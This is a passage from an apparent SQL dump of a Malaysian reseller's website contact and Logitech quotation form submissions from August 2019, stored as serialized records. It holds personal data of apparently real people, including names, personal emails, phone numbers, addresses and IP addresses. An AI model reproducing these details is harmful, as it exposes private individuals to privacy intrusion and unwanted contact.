Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0172924757\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Denave (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Suite 17-09, G Tower, 199 Jalan Tun Razak, 50400 Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:101:\"Please help to share the quotation as per details below. Group Conferencecam Part Number : 960-001054\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-22 16:36:56','103.228.57.50','1'),(280,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Luqman\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"ad.idicolaw@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0183793989\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Iylia Ismail &amp; Co.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"31\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-24 09:12:29','183.171.99.1','1'),(281,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Nadjet latit\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"latifnadjet7@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"0060173846072\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Zhour center\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Would like to have a zoom account\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"47\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-26 17:40:40','175.137.75.23','1'),(282,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"LIM YEE LEE\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"yeelee.lim@connellworld.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125197122\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Connell Bros. Company (Malaysia) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:107:\"6, Jalan Kontraktor U1/14, Hicom Glenmarie Industrial Park 40150 Shah Alam, Selangor Darul Ehsan, Malaysia.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"Logitech Rally, Group Expansion Mics, Group 15m Extended Cable\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-27 12:55:58','219.92.48.217','1'),(283,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"muhammad nazarul bin abdul razak\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"mabdulrazak@icrc.org\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0173438769\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"International Committee of the Red Cross\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:114:\"Unit 50-11-1 Level 11, Wisma UOA Damansara, No 50 Jalan Dungun, Damansara Heights 504900 Kuala Lumpur WP Malaysia.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:53:\"Hi, Can you provide us quotation for Logitech MeetUp.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"91\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-28 11:05:36','221.133.32.230','1'),(284,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"UMI AZEERA BINTI MADZI @ FUAD\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"umiazeerafuad@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0183616456\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"MIE INDUSTRIAL SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:130:\"Wisma MIE, No. 2, Jalan Industri PBP 2, Taman Industri Pusat Bandar Puchong, 47160 Puchong, Selangor D E, Malaysia. www.mie.com.my\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Meeting Room Booking System\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"20\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-30 08:57:45','219.92.54.74','1'),(285,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"UMI AZEERA BINTI MADZI @ FUAD\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"azeera_madzi@mie.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0183616456\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"MIE INDUSTRIAL SDN BHD\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:130:\"Wisma MIE, No. 2, Jalan Industri PBP 2, Taman Industri Pusat Bandar Puchong, 47160 Puchong, Selangor D E, Malaysia. www.mie.com.my\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Meeting Room Booking System\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"20\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-08-30 08:59:45','219.92.54.74','1'),(286,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full 